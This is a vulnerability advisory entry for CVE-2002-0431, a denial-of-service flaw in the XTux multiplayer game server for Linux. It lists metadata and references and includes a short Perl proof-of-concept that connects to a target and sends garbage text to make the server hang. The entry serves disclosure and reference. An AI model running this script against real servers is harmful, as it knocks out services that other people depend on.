XTux Garbage Data Denial-of-Service Vulnerability

Vulnerability ID: 1106639    Vulnerability type: Other
Published: 2002-03-09    Updated: 2006-04-18
CVE ID: CVE-2002-0431    CNNVD-ID: CNNVD-200207-098
Platform: Linux    CVSS score: 5.0
|Vulnerability sources
https://www.exploit-db.com/exploits/21338
https://www.securityfocus.com/bid/4260
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200207-098
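|Vulnerability details
XTux is a multiplayer network game that runs on the Linux operating system. XTux contains a denial-of-service vulnerability that a remote attacker can exploit to cause a denial of service. Connecting to the XTux server and sending arbitrary garbage characters can drive CPU utilization above 70%, resulting in a denial of service.
|Exploit (EXP)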
source: http://www.securityfocus.com/bid/4260/info

XTux is a multiplayer network game for Linux. The server component (June 01, 2001 version) is vulnerable to a denial of service initiated by connecting to the server and sending unexpected characters. This causes the server to become unresponsive and consume resources. 

#!/usr/bin/perl
#
# xtux server DoS - by b0iler
# server will become unresponsive and takes up lots of CPU.

use IO::Socket;

for($n=0;$n<=3;$n++){ #you shouldn't even need all 3 connections.
        print "Connecting to $ARGV[0] port $ARGV[1]\n";
        $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => $ARGV[1], Proto => 'tcp') or print "\ncouldn't connect\n\n";
        sleep 3;
        print $sock "garbage data\n\n";
}
exit;
|Affected products
Dave Lawrence XTux 2001.0 6.01 - Linux kernel 2.4.18
|References

Source: BID
Name: 4260
Link: http://www.securityfocus.com/bid/4260
Source: XF
Name: xtux-server-dos(8422)
Link: http://www.iss.net/security_center/static/8422.php
Source: BUGTRAQ
Name: 20020309xtuxserverDoS.
Link: http://online.securityfocus.com/archive/1/260912
Source: sourceforge.net
Link: https://sourceforge.net/tracker/index.php?func=detail&aid=529046&group_id=206&atid=100206